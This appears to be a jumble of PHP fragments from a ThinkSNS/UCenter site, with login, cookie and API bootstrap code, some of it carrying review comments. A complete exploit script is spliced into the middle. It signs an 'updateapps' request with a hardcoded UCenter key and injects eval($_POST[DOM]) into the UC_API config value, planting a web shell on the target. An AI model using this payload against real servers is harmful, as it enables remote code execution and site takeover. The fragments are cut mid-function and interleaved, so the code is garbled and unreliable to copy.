    // NOTE(review): no check that the cookie exists or decoded to an array.
    return $admin[$flag];
}
} function synlogin($get, $post) { $uid = $get['uid']; $username = $get['username']; if (!API_SYNLOGIN) { return API_RETURN_FORBIDDEN; } // require_once $this->appdir.'./forumdata/cache/cache_settings.php'; // // $cookietime = 2592000; // $discuz_auth_key = md5($_DCACHE['settings']['authkey'].$_SERVER['HTTP_USER_AGENT']); // header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"'); // $uid = intval($uid); // $query = $this->db->query("SELECT username, uid, password, secques FROM ".$this->tablepre."members WHERE uid='$uid'"); // if($member = $this->db->fetch_array($query)) { // _setcookie('sid', '', -86400 * 365); // _setcookie('cookietime', $cookietime, 31536000); // _setcookie('auth', _authcode("$member[password]\t$member[secques]\t$member[uid]", 'ENCODE', $discuz_auth_key), $cookietime); // } else { // _setcookie('cookietime', $cookietime, 31536000); // _setcookie('loginuser', $username, $cookietime); // _setcookie('activationauth', _authcode($username, 'ENCODE', $discuz_auth_key), $cookietime); // } // 原来的代码,实际上是discuz的登录cookies header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"'); _setcookie(COOKIE_NAME, _authcode($uid . "\t" . $username, 'ENCODE'), time() + 365 * 24 * 60 * 60);
/**
 * Get the current user's user name.
 *
 * Reads the `userName` entry of the JSON record held in the hcAdmin cookie
 * after passing the cookie through _authcode().
 *
 * @return mixed the `userName` value (the original docblock declared int)
 * @author lzx
 * @updater zjr
 */
function get_username()
{
    $cookiePlain = _authcode($_COOKIE['hcAdmin']);
    $admin = json_decode($cookiePlain, true);

    return $admin['userName'];
}
<?php // 代码版权归原作者所有! $timestamp = time() + 10 * 3600; $host = "127.0.0.1"; $uc_key = "eapf15K8b334Bc8eBeY4Gfn1VbqeA0N5Waofq6J285Ca33i151e551g0l9f2l3dd"; $code = urlencode(_authcode("time={$timestamp}&action=updateapps", 'ENCODE', $uc_key)); $cmd1 = '<?xml version="1.0" encoding="ISO-8859-1"?> <root> <item id="UC_API">http://xxx\');eval($_POST[DOM]);//</item> </root>'; $cmd2 = '<?xml version="1.0" encoding="ISO-8859-1"?> <root> <item id="UC_API">http://aaa</item> </root>'; $html1 = send($cmd1); echo $html1; $html2 = send($cmd2); echo $html2; function send($cmd) { global $host, $code; $message = "POST /api/uc.php?code=" . $code . " HTTP/1.1\r\n"; $message .= "Accept: */*\r\n"; $message .= "Referer: " . $host . "\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "Host: " . $host . "\r\n"; $message .= "Content-Length: " . strlen($cmd) . "\r\n"; $message .= "Connection: Close\r\n\r\n";
// UCenter API bootstrap: define return codes and paths, load the UCenter and
// ThinkSNS configuration, then decode the signed `code` query parameter into
// $get and the XML request body into $post.
define('API_RETURN_FORBIDDEN', '-2');
define('DISCUZ_ROOT', SITE_PATH . '/api/');
define('THINK_PATH', SITE_PATH . '/core/ThinkPHP');

set_magic_quotes_runtime(0);
defined('MAGIC_QUOTES_GPC') || define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());

require_once SITE_PATH . '/config/uc_config.inc.php';

// Load the ThinkSNS configuration; values from config.inc.php override the
// defaults from convention.php in the merge below.
$tsconfig1 = (require_once SITE_PATH . '/config/config.inc.php');
$tsconfig2 = (require_once SITE_PATH . '/core/OpenSociax/convention.php');
$tsconfig = array_merge($tsconfig2, $tsconfig1);
$cookiepre = $tsconfig['COOKIE_PREFIX'];
$cookiedomain = $tsconfig['COOKIE_DOMAIN'];
$cookiepath = $tsconfig['COOKIE_PATH'];

$_DCACHE = $get = $post = array();
$code = @$_GET['code'];
// The request fields are whatever decodes from `code` under UC_KEY.
parse_str(_authcode($code, 'DECODE', UC_KEY), $get);
if (MAGIC_QUOTES_GPC) {
    $get = _stripslashes($get);
}

// Timestamp verification.
// NOTE(review): the one-hour expiry check below is commented out, so a
// validly signed `code` is accepted regardless of its age. Confirm this is
// intentional; with it disabled a captured request stays replayable.
$timestamp = time();
// if($timestamp - $get['time'] > 3600) {
//     exit('Authracation has expiried');
// }

// An undecodable `code` leaves $get empty.
if (empty($get)) {
    exit('Invalid Request');
}
$action = $get['action'];

require_once DISCUZ_ROOT . './uc_client/lib/xml.class.php';
$post = xml_unserialize(file_get_contents('php://input'));
// For debugging: write log
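/**
 * Developer (front-end) login.
 *
 * Looks the newest developer row up by e-mail. For accounts whose status is
 * neither 4 nor 5 the password is checked against the interfacePower record
 * when one exists, otherwise against the developer row; on success the
 * `hcUser` cookie is set and the session is marked as logged in. Status 5
 * (not activated), status 4 and everything else produce their own
 * self::$errMsg entry.
 *
 * @return bool true on successful login, false otherwise
 */
public function act_login()
{
    $useremail = isset($_REQUEST['useremail']) && is_string($_REQUEST['useremail']) ? $_REQUEST['useremail'] : '';
    $userpassword = isset($_REQUEST['userpassword']) && is_string($_REQUEST['userpassword']) ? $_REQUEST['userpassword'] : '';
    // NOTE(review): a check code is submitted with the form but is never
    // verified in this method - confirm it is validated elsewhere.
    $checkCode = isset($_REQUEST['checkCode']) ? $_REQUEST['checkCode'] : '';

    $dvp = M('Developer');
    // The e-mail comes straight from the request and was concatenated into
    // the WHERE clause unescaped. Escape it for the quoted context.
    // NOTE(review): mysql_real_escape_string() needs the open connection;
    // prefer a bound parameter if the model layer offers one - confirm.
    $datas = $dvp->getDeveloper("*", "email = '" . mysql_real_escape_string($useremail) . "'", " order by id desc ", 1, 1);

    $userInfo = empty($datas) ? null : $datas[0];
    $status = $userInfo === null ? null : $userInfo['status'];

    if ($userInfo !== null && $status != 5 && $status != 4) {
        $powerInfo = M("interfacePower")->getUserInfoByLoginEmail($useremail);

        // NOTE(review): double md5 without a salt is kept because stored
        // hashes use it; plan a migration to password_hash().
        $submittedHash = md5(md5(trim($userpassword)));
        $storedHash = !empty($powerInfo) ? $powerInfo['loginPsd'] : $userInfo['login_pwd'];

        // Strict comparison: with `==`, two different hex digests that both
        // look like numbers ("0e..." forms) compare equal.
        if (!is_string($storedHash) || $storedHash !== $submittedHash) {
            self::$errMsg[10152] = get_promptmsg(10152);
            return false;
        }

        $dpInfor = array(
            "id" => $userInfo['id'],
            "email" => $userInfo['email'],
            "status" => $userInfo['status'],
            "app_key" => $userInfo['app_key'],
        );
        if (!empty($powerInfo)) {
            $dpInfor["pw_global_id"] = $powerInfo['userId'];
        }

        // NOTE(review): the cookie is set without HttpOnly/Secure flags and
        // the session id is not regenerated on login.
        setcookie('hcUser', _authcode(json_encode($dpInfor), 'ENCODE'), 0, "/");
        $_SESSION['loginStatus'] = "in";
        $this->act_setUserSomeInfor('progressInforFlag', 1);
        self::$errMsg[200] = get_promptmsg(200, '登录');
        return true;
    }

    if ($status == 5) {
        // Not activated yet: point the user at their webmail when known.
        $mailType = explode("@", $useremail);
        $emailAddrs = C('EMAILADDRESS');
        // Special handling for .edu mailboxes: the leading label of the
        // domain is replaced by "**" to find the configured URL template.
        $splitArray = explode(".", $mailType[1]);
        if (in_array("edu", $splitArray)) {
            $mailType[1] = str_replace($splitArray[0], "**", $mailType[1]);
            $emailAddrs[$mailType[1]] = str_replace("**", $splitArray[0], $emailAddrs[$mailType[1]]);
        }
        if (!empty($emailAddrs[$mailType[1]])) {
            self::$errMsg[10051] = "尚未激活,<a style='font-size:12px;text-decoration:blink' target='view_window' href='" . $emailAddrs[$mailType[1]] . "'>去邮箱激活</a>";
        } else {
            self::$errMsg[10154] = get_promptmsg(10154);
        }
        return false;
    }

    if ($status == 4) {
        self::$errMsg[10155] = get_promptmsg(10155);
        return false;
    }

    // No such account (or any other state).
    self::$errMsg[10156] = get_promptmsg(10156);
    return false;
}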